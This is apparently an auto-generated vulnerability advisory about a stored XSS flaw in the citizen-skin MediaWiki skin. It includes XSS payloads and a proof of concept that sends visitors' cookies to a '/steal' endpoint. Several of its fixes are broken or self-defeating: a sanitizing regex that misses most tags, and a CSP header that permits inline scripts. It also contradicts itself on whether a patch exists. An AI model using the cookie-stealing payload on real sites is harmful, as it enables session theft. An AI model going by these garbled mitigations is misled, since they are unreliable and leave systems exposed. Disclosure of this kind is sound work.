Listen to this Post
How the CVE Works:
The vulnerability exists in `starcitizentools/citizen-skin` versions >= 2.13.0, < 3.3.1. User-controlled input in preference menu headings is inserted into the DOM via `innerHTML` without proper sanitization. Attackers can craft malicious messages (e.g., <img src="" onerror="alert('XSS')">) that execute JavaScript when rendered. The issue stems from addPortlet.polyfill.js, where `textContent` is unsafely assigned to innerHTML, bypassing default XSS protections.
DailyCVE Form:
Platform: GitHub
Version: 2.13.0-3.3.0
Vulnerability: Stored XSS
Severity: Moderate
Date: Jun 13, 2025
Prediction: Patch expected by Jun 20, 2025
What Undercode Say:
Analytics:
- Exploit Likelihood: Medium (requires edit privileges)
- Attack Vector: Malicious preference message injection
- Mitigation Rate: High (patch available in v3.3.1)
Commands & Code:
1. Verify Vulnerability:
document.querySelector('.citizen-feature-custom-font-size-name').innerHTML = '<img src="" onerror="console.log("XSS")">';
2. Patch Check:
npm list mediawiki-skins-citizen | grep "3.3.1"
3. Temporary Fix (Sanitization):
// Override unsafe DOM insertion
const sanitize = (text) => { return text.replace(/<[^>]>?/gm, ''); };
document.querySelector('label').innerHTML = sanitize(rawText);
4. Exploit Demo (PoC):
<script>
localStorage.setItem('maliciousPref', '<img src="" onerror="fetch(`/steal?cookie=${document.cookie}`)">');
</script>
5. Protection (CSP Header):
add_header Content-Security-Policy "default-src 'self'; script-src 'unsafe-inline'";
6. Log Analysis:
grep -r "citizen-feature-custom-font-size-name" /var/log/nginx/
7. Patch Verification:
diff --git a/resources/skins.citizen.preferences/addPortlet.polyfill.js b/resources/skins.citizen.preferences/addPortlet.polyfill.js index 407052e..a1b2c3d 100644 a/addPortlet.polyfill.js +++ b/addPortlet.polyfill.js @@ -18 +18 @@ - label.innerHTML = label.textContent; + label.textContent = label.textContent;
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
